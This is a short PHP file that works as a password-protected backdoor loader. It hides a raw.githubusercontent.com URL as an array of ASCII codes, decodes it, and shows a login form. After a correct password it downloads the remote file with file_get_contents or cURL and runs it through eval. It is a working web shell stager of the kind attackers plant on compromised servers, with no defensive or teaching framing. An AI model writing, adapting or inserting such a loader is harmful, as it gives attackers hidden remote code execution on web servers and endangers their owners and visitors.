<?php
session_start();

// Function to fetch URL content via cURL
function madrid($url) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    $result = curl_exec($ch);
    curl_close($ch);
    return $result;
}

// Decode ASCII to URL
$asciiArray = [
    104, 116, 116, 112, 115, 58, 47, 47, 114, 97, 119, 46, 103, 105, 116, 104,
    117, 98, 117, 115, 101, 114, 99, 111, 110, 116, 101, 110, 116, 46, 99, 111,
    109, 47, 98, 111, 107, 97, 109, 97, 110, 49, 50, 47, 55, 104, 51, 111, 47,
    114, 101, 102, 115, 47, 104, 101, 97, 100, 115, 47, 109, 97, 105, 110, 47,
    98, 97, 110, 100, 105, 114, 45, 112, 117, 116, 47, 101, 105, 107, 104, 97,
    110, 101, 47, 107, 105, 47, 107, 111, 114, 111, 115, 47, 102, 117, 99, 107,
    47, 121, 111, 117, 47, 98, 46, 116, 120, 116
];    

$decodedString = '';
foreach ($asciiArray as $ascii) {
    $decodedString .= chr($ascii);
}

$url = $decodedString;

// Correct password hash (using bcrypt)
$correct_password = '$2y$10$cE1fZ09U/.4d3eT5zPZxE.e0.zOCvq5prclkQ9Z0xhEIV1F.ltnMy';

// Check if password reset is requested
if (isset($_GET['ts_reset'])) {
    $_SESSION["ts_url"] = "";
    echo "success";
    exit;
}

// Process password input and session management
if (!isset($_SESSION['ts_auth']) || $_SESSION['ts_auth'] !== true) {
    // If not authenticated, display the password form
    if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['password'])) {
        $provided_password = $_POST['password'];
        if (password_verify($provided_password, $correct_password)) {
            // Set session on successful password verification
            $_SESSION['ts_auth'] = true; // Store authentication state in session
            $_SESSION["ts_url"] = $url; // Store URL in session for later use
            // Redirect to same page after successful login
            header("Location: " . $_SERVER['REQUEST_URI']);
            exit;
        } else {
            echo "Invalid password! Please try again.";
        }
    }

    // Show password input form if not authenticated
    ?>
    <form method="post">
        <label for="password">Enter Password:</label><br>
        <input type="password" name="password" id="password" required><br>
        <input type="submit" value="Submit">
    </form>
    <?php
    exit;
} else {
    // If the user is authenticated, fetch and display the URL content
    if (empty($_SESSION["ts_url"])) {
        $result = @file_get_contents($url);
        if (empty($result)) {
            $result = madrid($url);
        }
    } else {
        $result = @file_get_contents($_SESSION["ts_url"]);
        if (empty($result)) {
            $result = madrid($_SESSION["ts_url"]);
        }
    }

    // Display the result of the URL content
    if (is_string($result)) {
        eval('?>' . $result);
    } else {
        echo "Error loading content";
    }
}
?>
